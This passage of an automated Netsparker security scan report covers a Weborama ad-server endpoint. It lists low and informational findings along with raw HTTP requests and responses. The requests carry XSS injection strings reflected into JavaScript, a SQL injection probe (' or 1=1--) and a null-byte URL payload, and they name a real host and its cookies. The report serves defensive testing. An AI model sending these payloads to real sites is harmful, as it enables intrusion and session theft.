clicktag_multiple: new Array(0,''%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00014E)%3C%2Fscript%3Ehttp%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag1%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D56%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx',''%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00014E)%3C%2Fscript%3Ehttp%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag2%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D56%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx',''%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00014E)%3C%2Fscript%3Ehttp%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag3%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D56%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx',''%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00014E)%3C%2Fscript%3Ehttp%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag4%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D56%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx',''%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00014E)%3C%2Fscript%3Ehttp%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag5%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D56%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx'),
wmode: 'opaque',
url_backup: 'http://cstatic.weborama.fr/transp.gif',
video_player: 'http://cstatic.weborama.fr/adperf/player/video.0.4.swf',
flash_min: 6,
video_param: 'http://ieo.solution.weborama.fr/fcgi-bin/performance.fcgi?ID=449484&A=5&L=496052&C=21277&P=37169&CREA=56&VIDEO_PARAM=',
format_crea1: 'Flash',
format_crea2: '',
host: 'ieo.solution.weborama.fr'
};

document.write('<scr'+'ipt type="text/javascript" id="wbo_lib_' + window.wbo_params['rand'] + '" src="http://istatic.weborama.fr/js/advertiser/format.201104061052.js"></scr'+'ipt>');

function wbo_show_2_56() { return Advertiser201104061052.Expand.show(wbo_creative_56); }
function wbo_hide_2_56() { return Advertiser201104061052.Expand.hide(wbo_creative_56); }
function wbo_close_swf_56() { return Advertiser201104061052.Flash.close(wbo_creative_56); }
if (window.wbo_params['root_x'] != -1 && window.wbo_params['root_y'] != -1) {
window['wbo_swftrans_close'] = function(){ wbo_close_swf_56(); }
}

function event_56() { return Advertiser201104061052.Video.event_for_creative(wbo_creative_56); }
- /fcgi-bin/adserv.fcgi

/fcgi-bin/adserv.fcgi

http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&BOUNCE=OK&brnd=43621&cli..

Parameters

Parameter Type Value
tag GET 496052
f GET 2149
ef GET 1
BOUNCE GET OK
brnd GET 43621
clicktag GET '"--></style></script><script>alert(0x000167)</script>
rnd GET [RANDOM]

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&BOUNCE=OK&brnd=43621&clicktag='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000167)%3C/script%3E&rnd=%5BRANDOM%5D HTTP/1.1
Referer: http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag=%5BURLTRACKING%5D13256991'%20or%201=1--%20&rnd=%5BRANDOM%5D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ieo.solution.weborama.fr
Cookie: _adpc=VW4DuWbu; _adpp=VW4DuZgraa; _adpe=VW60Kqa; _advcrea=6-|g.A.b0.ci.bQ.U.q.bG.b@.cC.K.cs.4.bc.bm.bw|a:doemcgpkfljbinhq; _adpe_c=VW60Kqaaaaa; _adpp_c=VW4aadgrab1tmzeahvmaaaaDu---ap--mzea; _advcrea_c=6-|g.b0.U|a:cdb; _adpc_c=VW4DuWa@aaaad---aaq; wr_llc=496052; AFFICHE_W=aIbBNdSavl9n79; wbo_performance=NDQ5NDg0fDQ5NjA1Mnww
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 01:01:54 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM"
Set-Cookie: _adpc=VW4DuWbv; domain=.ieo.solution.weborama.fr; path=/; expires=Sun, 03-Jul-2011 00:08:38 GMT,_adpp=VW4DuZgraa; domain=.ieo.solution.weborama.fr; path=/; expires=Sun, 03-Jul-2011 00:08:38 GMT,_adpe=VW60Kqa; domain=.ieo.solution.weborama.fr; path=/; expires=Sun, 03-Jul-2011 00:08:38 GMT,_advcrea=6-|4.A.b0.ci.bQ.U.q.bG.b@.g.cC.K.cs.bc.bm.bw|a:doencgplfmjkibhq; domain=.ieo.solution.weborama.fr; path=/; expires=Fri, 12-Aug-2011 00:08:38 GMT
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: application/x-javascript


window['wbo_params'] = {
id: 56,
tag: '496052',
site: '449484',
w: 298,
h: 250,
root_x: '-1',
root_y: '-1',
zindex: '4242',
clic: ''"--></style></script><script>netsparker(0x000167)</script>http://ieo.solution.weborama.fr/fcgi-bin/performance.fcgi?ID=449484&A=1&L=496052&C=21277&P=37169&CREA=56&T=E&URL=http%3A%2F%2Fwww.ieo.it%2FItaliano%2FPages%2FDefault.aspx',
target: '_blank',
url: 'http://elstatic.weborama.fr/adperf/449484/21277/201104/21080930_gds-ieobanner-box-13-di-16gds-ieobanner-box-13-di-16.swf',
pixel: '',
format: 'Flash',
rand: '1304384514'+'_'+new Date().getTime(),
partner: '37169',
clicktag: 'clicktag',
clicktag_multiple: new Array(0,''%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000167)%3C%2Fscript%3Ehttp%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag1%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D56%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx',''%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000167)%3C%2Fscript%3Ehttp%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag2%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D56%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx',''%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000167)%3C%2Fscript%3Ehttp%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag3%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D56%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx',''%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000167)%3C%2Fscript%3Ehttp%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag4%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D56%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx',''%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000167)%3C%2Fscript%3Ehttp%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag5%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D56%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx'),
wmode: 'opaque',
url_backup: 'http://cstatic.weborama.fr/transp.gif',
video_player: 'http://cstatic.weborama.fr/adperf/player/video.0.4.swf',
flash_min: 6,
video_param: 'http://ieo.solution.weborama.fr/fcgi-bin/performance.fcgi?ID=449484&A=5&L=496052&C=21277&P=37169&CREA=56&VIDEO_PARAM=',
format_crea1: 'Flash',
format_crea2: '',
host: 'ieo.solution.weborama.fr'
};

document.write('<scr'+'ipt type="text/javascript" id="wbo_lib_' + window.wbo_params['rand'] + '" src="http://istatic.weborama.fr/js/advertiser/format.201104061052.js"></scr'+'ipt>');

function wbo_show_2_56() { return Advertiser201104061052.Expand.show(wbo_creative_56); }
function wbo_hide_2_56() { return Advertiser201104061052.Expand.hide(wbo_creative_56); }
function wbo_close_swf_56() { return Advertiser201104061052.Flash.close(wbo_creative_56); }
if (window.wbo_params['root_x'] != -1 && window.wbo_params['root_y'] != -1) {
window['wbo_swftrans_close'] = function(){ wbo_close_swf_56(); }
}

function event_56() { return Advertiser201104061052.Video.event_for_creative(wbo_creative_56); }
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /fcgi-bin/performance.fcgi

/fcgi-bin/performance.fcgi CONFIRMED

http://ieo.solution.weborama.fr/fcgi-bin/performance.fcgi?ID=449484&A=1&L=496052&C=21277&P=37169&CRE..

Parameters

Parameter Type Value
ID GET 449484
A GET 1
L GET 496052
C GET 21277
P GET 37169
CREA GET 6
T GET E
URL GET http://netsparker.com/n?.aspx

Request

GET /fcgi-bin/performance.fcgi?ID=449484&A=1&L=496052&C=21277&P=37169&CREA=6&T=E&URL=http://netsparker.com/n?%00.aspx HTTP/1.1
Referer: http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&BOUNCE=OK&brnd=43621&clicktag=%5BURLTRACKING%5D13256991'%20or%201=1--%20&rnd=%5BRANDOM%5D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ieo.solution.weborama.fr
Cookie: _adpc=VW4DuWaY; _adpp=VW4DuZgraa; _adpe=VW60Kqa; _advcrea=6-|ci.g.K.cC.A.cs.b0.4.bQ.U.bc.q.bm.bG.b@|a:hlbgfknejdpcoim; _adpe_c=VW60Kqaaaaa; _adpp_c=VW4DuZgrab1taaaa; _advcrea_c=6-|g.b0.U|a:cdb; _adpc_c=VW4DuWaT; wr_llc=496052; AFFICHE_W=aJ5KfgN6u79n85; wbo_performance=Jz48bmV0IHNwYXJrZXI9bmV0c3BhcmtlcigweDAwMDBDNik+fDQ5NjA1MnwwOjQ0OTQ4NHw0OTYwNTJ8MA
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 03 May 2011 01:01:47 GMT
Server: Apache
Content-Length: 536
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator, root@weborama.fr and inform them of the time the error occurred,and anything you might have done that may havecaused the error.</p><p>More information about this error may be availablein the server error log.</p></body></html>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /fcgi-bin/adserv.fcgi

/fcgi-bin/adserv.fcgi CONFIRMED

http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag=%5BURLTRACKING%..

Identified Cookie

AFFICHE_W

Request

GET /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag=%5BURLTRACKING%5D13256991'%20or%201=1--%20&rnd=%5BRANDOM%5D HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ieo.solution.weborama.fr
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 01:01:30 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM"
Set-Cookie: AFFICHE_W=aMwQewJQu79n34;expires=Thu, 02 May 2013 01:01:30 GMT;domain=.weborama.fr;path=/
Location: http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&BOUNCE=OK&brnd=43621&clicktag=%5BURLTRACKING%5D13256991'%20or%201=1--%20&rnd=%5BRANDOM%5D
Content-Length: 373
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi?tag=496052&amp;f=2149&amp;ef=1&amp;BOUNCE=OK&amp;brnd=43621&amp;clicktag=%5BURLTRACKING%5D13256991'%20or%201=1--%20&amp;rnd=%5BRANDOM%5D">here</a>.</p></body></html>
TRACE / TRACK Identified

TRACE / TRACK Identified

1 TOTAL
LOW
CONFIRMED
1
Netsparker identified that the TRACE/TRACK method is allowed.

Impact

If the application is vulnerable to Cross-site Scripting and uses Http-Only Cookies then an attacker can bypass the Http-Only cookies limitation and read the cookies in an XSS attack.

Remedy

Disable this method in all production systems. Even though the application is not vulnerable to Cross-site Scripting a debugging feature such as TRACE/TRACK should not be required in a production system and therefore should be disabled.

External References

- /fcgi-bin/adserv.fcgi

/fcgi-bin/adserv.fcgi CONFIRMED

http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag=%5BURLTRACKING%..

Request

TRACK /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag=%5BURLTRACKING%5D13256991'%20or%201=1--%20&rnd=%5BRANDOM%5D HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ieo.solution.weborama.fr
Cookie: AFFICHE_W=aPOZ7xNQu79n94
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 01:01:31 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM"
Set-Cookie: _adpc=VW4DuWab; domain=.ieo.solution.weborama.fr; path=/; expires=Sun, 03-Jul-2011 00:14:53 GMT,_adpp=VW4DuZgraa; domain=.ieo.solution.weborama.fr; path=/; expires=Sun, 03-Jul-2011 00:14:53 GMT,_adpe=VW60Kqa; domain=.ieo.solution.weborama.fr; path=/; expires=Sun, 03-Jul-2011 00:14:53 GMT,_advcrea=6-|b0|a:b; domain=.ieo.solution.weborama.fr; path=/; expires=Fri, 12-Aug-2011 00:14:53 GMT
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: application/x-javascript


window['wbo_params'] = {
id: 116,
tag: '496052',
site: '449484',
w: 298,
h: 250,
root_x: '-1',
root_y: '-1',
zindex: '4242',
clic: '[URLTRACKING]13256991' or 1=1-- http://ieo.solution.weborama.fr/fcgi-bin/performance.fcgi?ID=449484&A=1&L=496052&C=21277&P=37169&CREA=116&T=E&URL=http%3A%2F%2Fwww.ieo.it%2FItaliano%2FPages%2FDefault.aspx',
target: '_blank',
url: 'http://elstatic.weborama.fr/adperf/449484/21277/201104/21080954_gds-ieobanner-box-13-di-16gds-ieobanner-box-4-di-16.swf',
pixel: '',
format: 'Flash',
rand: '1304384491'+'_'+new Date().getTime(),
partner: '37169',
clicktag: 'clicktag',
clicktag_multiple: new Array(0,'%5BURLTRACKING%5D13256991'%20or%201%3D1--%20http%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag1%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D116%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx','%5BURLTRACKING%5D13256991'%20or%201%3D1--%20http%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag2%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D116%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx','%5BURLTRACKING%5D13256991'%20or%201%3D1--%20http%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag3%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D116%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx','%5BURLTRACKING%5D13256991'%20or%201%3D1--%20http%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag4%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D116%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx','%5BURLTRACKING%5D13256991'%20or%201%3D1--%20http%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag5%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D116%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx'),
wmode: 'opaque',
url_backup: 'http://cstatic.weborama.fr/transp.gif',
video_player: 'http://cstatic.weborama.fr/adperf/player/video.0.4.swf',
flash_min: 6,
video_param: 'http://ieo.solution.weborama.fr/fcgi-bin/performance.fcgi?ID=449484&A=5&L=496052&C=21277&P=37169&CREA=116&VIDEO_PARAM=',
format_crea1: 'Flash',
format_crea2: '',
host: 'ieo.solution.weborama.fr'
};

document.write('<scr'+'ipt type="text/javascript" id="wbo_lib_' + window.wbo_params['rand'] + '" src="http://istatic.weborama.fr/js/advertiser/format.201104061052.js"></scr'+'ipt>');

function wbo_show_2_116() { return Advertiser201104061052.Expand.show(wbo_creative_116); }
function wbo_hide_2_116() { return Advertiser201104061052.Expand.hide(wbo_creative_116); }
function wbo_close_swf_116() { return Advertiser201104061052.Flash.close(wbo_creative_116); }
if (window.wbo_params['root_x'] != -1 && window.wbo_params['root_y'] != -1) {
window['wbo_swftrans_close'] = function(){ wbo_close_swf_116(); }
}

function event_116() { return Advertiser201104061052.Video.event_for_creative(wbo_creative_116); }
Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /fcgi-bin/

/fcgi-bin/ CONFIRMED

http://ieo.solution.weborama.fr/fcgi-bin/

Request

GET /fcgi-bin/ HTTP/1.1
Referer: http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag=%5BURLTRACKING%5D13256991'%20or%201=1--%20&rnd=%5BRANDOM%5D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ieo.solution.weborama.fr
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Date: Tue, 03 May 2011 01:01:30 GMT
Server: Apache
Content-Length: 211
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /fcgi-bin/on this server.</p></body></html>
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /fcgi-bin/performance.fcgi

/fcgi-bin/performance.fcgi

http://ieo.solution.weborama.fr/fcgi-bin/performance.fcgi?ID=449484&A=1&L=496052&C=21277&P=37169&CRE..

Parameters

Parameter Type Value
ID GET 449484
A GET 1
L GET 496052
C GET 21277
P GET 37169
CREA GET 6
T GET E
URL GET http://netsparker.com/n?.aspx

Found E-mails

root@weborama.fr

Request

GET /fcgi-bin/performance.fcgi?ID=449484&A=1&L=496052&C=21277&P=37169&CREA=6&T=E&URL=http://netsparker.com/n?%00.aspx HTTP/1.1
Referer: http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&BOUNCE=OK&brnd=43621&clicktag=%5BURLTRACKING%5D13256991'%20or%201=1--%20&rnd=%5BRANDOM%5D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ieo.solution.weborama.fr
Cookie: _adpc=VW4DuWaY; _adpp=VW4DuZgraa; _adpe=VW60Kqa; _advcrea=6-|ci.g.K.cC.A.cs.b0.4.bQ.U.bc.q.bm.bG.b@|a:hlbgfknejdpcoim; _adpe_c=VW60Kqaaaaa; _adpp_c=VW4DuZgrab1taaaa; _advcrea_c=6-|g.b0.U|a:cdb; _adpc_c=VW4DuWaT; wr_llc=496052; AFFICHE_W=aJ5KfgN6u79n85; wbo_performance=Jz48bmV0IHNwYXJrZXI9bmV0c3BhcmtlcigweDAwMDBDNik+fDQ5NjA1MnwwOjQ0OTQ4NHw0OTYwNTJ8MA
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 03 May 2011 01:01:47 GMT
Server: Apache
Content-Length: 536
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator, root@weborama.fr and inform them of the time the error occurred,and anything you might have done that may havecaused the error.</p><p>More information about this error may be availablein the server error log.</p></body></html>